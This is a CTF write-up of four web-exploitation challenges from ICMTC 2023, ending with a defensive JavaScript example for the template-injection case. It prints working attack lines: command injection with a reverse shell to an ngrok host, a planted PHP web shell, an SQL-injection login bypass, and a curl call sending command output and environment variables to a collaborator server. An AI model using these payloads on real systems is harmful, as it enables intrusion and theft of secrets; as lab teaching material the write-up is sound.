ICMTC CTF 2023 Write-up (Web Exploitation)

Anas Ibrahim
Jul 4, 2023


Comparison (100 points)

After opening the challenge, I found PHP code showing that the page takes a text parameter. To obtain the flag, that parameter must be given the correct value, as shown in the following image.

php code.

When I requested http://159.65.116.234:8087/?text=1e3, it returned Try Again.

Therefore, I used the dirsearch tool to fuzz directories and discovered the following paths.

/index.php

/index.php/login

dirsearch results.

However, when I appended the parameter to the index.php path, it still returned Try Again. So I decided to investigate what the text parameter value means by searching Google for what 1e3 represents, as shown in the following image.

1e3 represents 1000 in decimal.

Finally, I supplied the value 1000 in decimal format as the text parameter, and the flag was displayed.

The flag

Ping me (100 points)

This challenge required pinging an IP address and sending four packets to the target host.

ping me challenge

I suspected that the challenge could be vulnerable to command injection, so I submitted ;whoami and it returned www-data. However, the application does not accept spaces.

To bypass this limitation, I referred to the PayloadsAllTheThings project on GitHub and found that the < character can be used in place of a space when executing commands. Using this technique, I was able to read the /etc/passwd file, which lists all users on the system.

/etc/passwd

After several unsuccessful attempts at obtaining the flag directly, I decided to try a reverse shell with netcat. However, this did not work. So I used an Ngrok tunnel to expose a listener on localhost and obtain a reverse shell. I started Ngrok listening on port 8888 with the following command.

sudo ngrok tcp 8888
ngrok

I attempted to obtain a reverse shell using the following command:

;sh</dev/tcp/7.tcp.eu.ngrok.io/11276
requesting reverse shell

Next, I listened on port 8888 using netcat by running the command nc -nlvp 8888 as shown below.

Listener on port 8888

So, I obtained a blind reverse shell because the output did not appear directly to me. As a result, I decided to upload a file containing PHP code, which was as follows: echo '<?php system($_REQUEST['flag']) ?>' > hacker.php.

The output is blind as well.

Then I ran the ;ls command on the ping me page and saw that hacker.php had been uploaded successfully. So I ran commands through the flag parameter of the hacker.php file I had uploaded, and it worked.

www-data

I intercepted the request and searched for the flag using the find command with the following syntax: find / -name flag*. The command returned more than one flag in the /tmp directory.

/tmp/flag*

I read the first flag with cat /tmp/flag_DKAVBS.txt and submitted it successfully.

The flag.

Hidden in the plain sight (132 points)

I opened the challenge and found that the title was Nothing Here, as shown in the following image.

nothing here

I used dirsearch to fuzz directories and discovered the robots.txt file. After opening it, I found two paths that redirected to /login.php. Therefore, I needed to bypass the login in order to obtain the flag.

I believed that the login page might be vulnerable to error-based SQL injection, because entering admin' returned an SQL syntax error. Therefore, I attempted to bypass the login page using the following payload: admin' -- -.

bypassing login using sqli

This logged me in as admin.

admin.php

After returning to the robots.txt file, I accessed the /su3rSecrttttt path and successfully obtained the flag.

The flag.

EvilCalc (460 points)

This challenge involves calculating your net salary, and it requires four inputs: salary_number, medical_insurance, social_insurance, and taxes. The last input was reflected on the page, as shown in the following image, so I suspected that it might be vulnerable to template injection.

evilcalc.

I intercepted the request and attempted to inject payloads such as ${7*7}, which resulted in an error. However, when I tried {{7*7}}, there was no error returned. Therefore, I suspected that the application might be vulnerable to blind Server-Side Template Injection (SSTI).

{{7*7}} produced no error, whereas ${7*7} returned an error.

At first I believed that the template engine was Jinja2 (Python), but it turned out to be Node.js. Therefore, I searched for payloads for this vulnerability and took them from the PayloadsAllTheThings repository. I found a payload that executed id, but the output was blind. As a result, I sent the request to a Burp Collaborator server to obtain the result.

curl http://burpcollaborator/?data=`id`
id

Pressing Poll now in Collaborator showed the result: the node user.

node user

Next, I attempted to print process.env, which contains all of the process's environment variables, with the same payload. However, it was not successful. Therefore, I searched for another payload and found one that worked.

process.env

The payload shown above sends an HTTP GET request to the specified Collaborator URL, with the environment variables of the current process as the value of the query parameter named data.

Navigate to collaborator.

environment variables

After passing the environment variables through Decoder, I was able to obtain the flag from a variable called FLAG.

The flag.
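The root cause of EvilCalc is that the taxes field ends up inside the template source, so the engine evaluates {{7*7}} instead of displaying it. As an added example that is not the challenge's code, the block below models that pattern beside a hardened version in which the four fields are validated as plain numbers and rendered only as data. The tiny "engine", the salary formula and all function names are assumptions of mine; the real Node template library used by the challenge is not named in the write-up.

```javascript
// Added example, not the challenge's code: EvilCalc-style input handling done
// two ways. The "engine" is a hypothetical stand-in for whatever Node template
// library the challenge used; {{ expr }} is evaluated as JavaScript.
function renderUnsafe(templateString) {
  return templateString.replace(/\{\{([^}]*)\}\}/g, (_, expr) =>
    String(new Function("return (" + expr + ")")()));
}

// Vulnerable pattern: the user's field is spliced into the template source, so
// a probe such as {{7*7}} is evaluated by the engine instead of being shown.
function netSalaryPageUnsafe(form) {
  return renderUnsafe("Net salary calculated. Taxes entered: " + form.taxes);
}

// Hardened pattern, part 1: placeholders are looked up in `data`, nothing is
// evaluated, and values are HTML-escaped before reaching the page.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(templateString, data) {
  return templateString.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, key) =>
    Object.prototype.hasOwnProperty.call(data, key) ? escapeHtml(data[key]) : "");
}

// Hardened pattern, part 2: each amount must be a plain non-negative decimal,
// so "{{7*7}}", "${7*7}", "1e999" and "" are all rejected before any rendering.
function parseAmount(field) {
  if (typeof field !== "string" || !/^\d+(\.\d+)?$/.test(field.trim())) return null;
  const n = Number(field.trim());
  return Number.isFinite(n) && n >= 0 ? n : null;
}

const FIELDS = ["salary_number", "medical_insurance", "social_insurance", "taxes"];
const PAGE = "Net salary: {{ net }} (taxes entered: {{ taxes }})";

function netSalaryPage(form) {
  const vals = {};
  for (const f of FIELDS) {
    const v = parseAmount(form[f]);
    if (v === null) return { ok: false, error: "invalid " + f };
    vals[f] = v;
  }
  // Assumed formula (the challenge's real one is not shown in the write-up).
  const net = vals.salary_number - vals.medical_insurance - vals.social_insurance - vals.taxes;
  return { ok: true, html: renderSafe(PAGE, { net, taxes: vals.taxes }) };
}
```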

Finally, I hope you found the write-up helpful. I explained all of the challenges to the best of my ability.

done.
